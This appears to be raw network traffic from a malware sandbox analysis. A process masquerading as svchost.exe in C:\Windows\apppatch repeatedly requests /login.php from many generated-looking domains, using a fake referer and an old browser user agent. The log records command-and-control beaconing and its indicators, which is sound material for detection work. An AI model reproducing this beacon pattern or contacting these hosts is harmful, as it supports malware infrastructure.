                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyfuv.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344905|1731344858|23|2|0
Nov 11, 2024 18:08:34.313124895 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:34 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344914|1731344858|16|3|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
77 | 192.168.2.9 | 62645 | 23.253.46.64 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:33.904076099 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gahyqah.com
Nov 11, 2024 18:08:34.358036041 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Server: Microsoft-IIS/7.5
                                                                                                                                                                                                            X-Powered-By: ASP.NET
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:28 GMT
                                                                                                                                                                                                            Content-Length: 1245
                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-contai [TRUNCATED]
Nov 11, 2024 18:08:34.358048916 CET | 169 | IN
                                                                                                                                                                                                            Data Ascii: <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port
78 | 192.168.2.9 | 62648 | 3.94.10.34 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:35.540366888 CET | 353 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lymyxid.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344906|1731344858|24|2|0
Nov 11, 2024 18:08:36.740261078 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:35 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344915|1731344858|16|3|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0
Nov 11, 2024 18:08:36.741995096 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:35 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344915|1731344858|16|3|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0
Nov 11, 2024 18:08:36.744466066 CET | 335 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:35 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344915|1731344858|16|3|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
79 | 192.168.2.9 | 62650 | 199.191.50.83 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:35.664788008 CET | 279 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galyqaz.com
                                                                                                                                                                                                            Cookie: vsid=910vr4788904590031611
Nov 11, 2024 18:08:37.391514063 CET | 620 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:36 GMT
                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                            Location: //ww8.galyqaz.com
                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port
80 | 192.168.2.9 | 62658 | 178.162.203.211 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:35.681813002 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com
Nov 11, 2024 18:08:35.989332914 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com
Nov 11, 2024 18:08:36.410347939 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: gatyfus.com


Session ID | Source IP | Source Port | Destination IP | Destination Port
81 | 192.168.2.9 | 62643 | 208.100.26.245 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:43.839986086 CET | 243 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lyvyxor.com


Session ID | Source IP | Source Port | Destination IP | Destination Port
82 | 192.168.2.9 | 62667 | 199.59.243.227 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 18:08:43.847888947 CET | 305 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
                                                                                                                                                                                                            Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 56876 | 99.83.170.3 | 443 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:07:39 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-11-11 17:07:39 UTC | 352 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000
                                                                                                                                                                                                            Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:39 GMT
                                                                                                                                                                                                            Etag: "gld75vn2va19wv"
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Server: awselb/2.0
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            X-Powered-By: Next.js
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 56880 | 188.114.96.3 | 443 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:07:39 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-11-11 17:07:40 UTC | 943 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:40 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yxBl%2BU1di8myqSyomKhdTxMkueBNPufV9F2zXrBad3JyTyy2b9I1XPYwnytHR19sKAVouOjLtNSBAGHOzRwgTJvKJuW8iMW6a8Nj3wUvcPmDfs3EGmlxpZTsxBe4vg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe13cdf1f7ca8-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1258&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2824&recv_bytes=881&delivery_rate=2266040&cwnd=251&unsent_bytes=0&cid=5a5fdb9f7b7a9336&ts=814&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 56896 | 188.114.96.3 | 443 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:07:41 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-11-11 17:07:41 UTC | 951 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:41 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2B9GI8VCCOkAhQFFrFli4ZI4XfGUYlt7f%2FjhVyMUVB6t%2FiXruXl2W6Ecfgg0HbCWsOmjE7Fz0L9TXI7I75MHDoHdgjaDJoRbE0cd3IZeE74i6nnqlbAC%2F8NOe%2FdrlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe146b96d43e2-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=881&delivery_rate=2503025&cwnd=251&unsent_bytes=0&cid=225e217fac765eba&ts=779&x=0"
                                                                                                                                                                                                            Data Ascii: tent .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 56920 | 188.114.96.3 | 443 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:07:44 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-11-11 17:07:45 UTC | 1097 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:45 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            server-timing: amp_sanitizer;dur="34.7",amp_style_sanitizer;dur="16.4",amp_tag_and_attribute_sanitizer;dur="13.0",amp_optimizer;dur="16.1"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y54P%2FbC6Czn91DdFrBkD9dlpnnSwTVe%2BQ%2BXI46GnlYb15puEDyVJ3Qyf7eFI%2F8sod16RbKHjaD5vzEvblvLpPiKkG4V762%2FB%2FaqdNQgm4PFjAb0M4J%2FO5%2BPIvEOTEg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1599a3be014-NRT
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=155407&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=881&delivery_rate=18636&cwnd=32&unsent_bytes=0&cid=5a634b9774fd58d2&ts=1343&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 56942 | 188.114.96.3 | 443 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:07:46 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: lysyvan.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-11-11 17:07:47 UTC | 1092 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:07:47 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            server-timing: amp_sanitizer;dur="48.4",amp_style_sanitizer;dur="20.0",amp_tag_and_attribute_sanitizer;dur="22.4",amp_optimizer;dur="24.5"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5dIJnh%2FNAB49Q0h87DSz8i8v4u3vZRoD2hBl66julo9bS2MbsgPloCPrIv2sY%2B%2BT%2FPPI3KKkoTrLOC7iy6vbyhb6vQaWzY2Qq%2B4gtUGnvd7DN3oaqn3BkVw5XZsT1w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1667ea542c1-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1143&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2439764&cwnd=251&unsent_bytes=0&cid=b3c5f4b20f6ea0cb&ts=1454&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 54964 | 99.83.170.3 | 443 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:08:01 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: puzylyp.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-11-11 17:08:01 UTC | 352 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000
                                                                                                                                                                                                            Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:01 GMT
                                                                                                                                                                                                            Etag: "cqr8k3giq619wv"
                                                                                                                                                                                                            Server: Caddy
                                                                                                                                                                                                            Server: awselb/2.0
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            X-Powered-By: Next.js
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.9 | 54965 | 188.114.96.3 | 443 | 7444 | C:\Windows\apppatch\svchost.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-11 17:08:01 UTC | 267 | OUT | GET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qegyhig.com
                                                                                                                                                                                                            Connection: Keep-Alive
2024-11-11 17:08:01 UTC | 947 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:01 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                            link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6NixuP3VHlvY4a02QkX1H56AcLLYyzixeP91QbMAUYmbBYkmpVd9IO8pJOYEl74N4FoTtoX6by59j8%2BlD%2FFV%2B6XWnQtZLZM7bNpX2IhomPSPjiv2lwcwRKxcvQrUQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e0fe1c39d490fa9-EWR
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1357&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=881&delivery_rate=2219157&cwnd=246&unsent_bytes=0&cid=ecfe42cacef3ed9e&ts=806&x=0"
                                                                                                                                                                                                            Data Ascii: bkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{c
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC1369INData Raw: 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e
                                                                                                                                                                                                            Data Ascii: .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-con
                                                                                                                                                                                                            2024-11-11 17:08:01 UTC1369INData Raw: 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70
                                                                                                                                                                                                            Data Ascii: .woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="p
